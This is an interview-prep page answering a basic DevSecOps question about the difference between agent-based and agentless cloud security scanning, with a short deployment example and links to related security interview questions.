Interview › Security & DevSecOps
What is the difference between agent-based and agentless cloud security scanning? [Basic]
Answer
Agent-based scanning installs software on workloads to collect deep host or runtime telemetry. Agentless scanning connects through cloud APIs and snapshots/metadata to assess resources without installing agents. Agentless is easier to deploy broadly; agent-based is deeper for runtime behavior.
Technical explanation
Agentless scanning has strong coverage for cloud inventory, misconfiguration, image/package vulnerabilities, identities, and exposure without operational friction.
Agent-based tools can observe process activity, network connections, file changes, and runtime attacks in real time.
Most mature programs use agentless for broad posture and agents or eBPF/runtime sensors for high-risk workloads.
Hands-on example
Example: use agentless scanning to inventory every AWS account in two days and prioritize exposed vulnerable assets. Add runtime agents to payment and identity workloads where process-level detection and response are required.
Check how well your resume matches the role with our free resume checker— match score, ATS check, and the skills you're missing.
More Security & DevSecOps interview questions
- What is DevSecOps, and how does it differ from traditional security gating at the end? [Basic]
- What does shift-left security mean, and why does it matter? [Basic]
- What is the difference between SAST, DAST, IAST, and SCA? [Basic]
- When in the pipeline does each of SAST, DAST, and SCA run? [Basic]
- What is the difference between SAST and DAST, and what does each catch and miss? [Basic]
- What is software composition analysis (SCA), and why does it matter for dependencies? [Basic]
- What is SonarQube, and what does it analyse? [Basic]
- Is SonarQube primarily SAST, code quality, or both? [Basic]